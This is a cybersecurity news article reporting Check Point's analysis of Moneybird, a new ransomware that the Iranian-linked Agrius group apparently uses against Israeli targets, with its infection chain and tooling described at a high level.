iscover
Share this article on:
Powered by
MOMENTUM
MEDIA
Security operators have identified a hacking campaign run by an Iranian hacking group targeting organisations in Israel with a unique new ransomware variant.
The Check Point Incident Response Team (CPIRT) spotted the new variant when responding to a ransomware attack on a client. Dubbed Moneybird by the hackers, the CPIRT found that while the software was new, the operators were likely the Agrius group based on other tactics, techniques, and procedures.
The group had previously utilised a custom ransomware called Apostle, but Check Point believes Moneybird — written in C++ — is part of an effort to evolve Agrius’ offensive capabilities.
Agrius’ infection chain begins with taking advantage of public-facing web server vulnerabilities. From there, the threat actor deploys a number of variants of the ASPXSpy webshell, deployed inside apparent text files.
The group also uses a number of openly available platforms, notably SoftPerfect Network Scanner for scanning networks, Plink to manage traffic from a VPS owned by the actor, ProcDump to harvest credentials, and FileZilla to exfiltrate files once they’re compressed.
Agrius also uses a couple of legitimate file-hosting sites in the deployment of its software.
Unusually, the Moneybird ransomware does not use command line parameters, instead relying upon an embedded configuration blob, likely tuned for the target’s environment. This limitation makes it less than ideal for deploying across multiple environments.
“Moneybird itself, although not particularly complex, has a number of intriguing features that appear to have been designed for specific targets,” Check Point’s researchers said in a blog post. “Some of these special features make the malware less practical for use in multiple unrelated campaigns. This emphasises the malware’s targeted nature, including the use of ‘targeted paths’, which, in the specific sample we analysed, makes the ransomware ignore most of the files on the target machine.”
Agrius itself has been operating since at least 2021 and is thought to be linked to the Iranian Ministry of Intelligence and Security. It operates mainly in the Middle East, with a focus on targets in Israel. The group operates under a number of aliases, including BlackShadow, and previously targeted the Israeli insurance company Shirbit and the Bar Ilan University.
David Hollingworth has been writing about technology for over 20 years, and has worked for a range of print and online titles in his career. He is enjoying getting to grips with cyber security, especially when it lets him talk about Lego.
Be the first to hear the latest developments in the cyber industry.
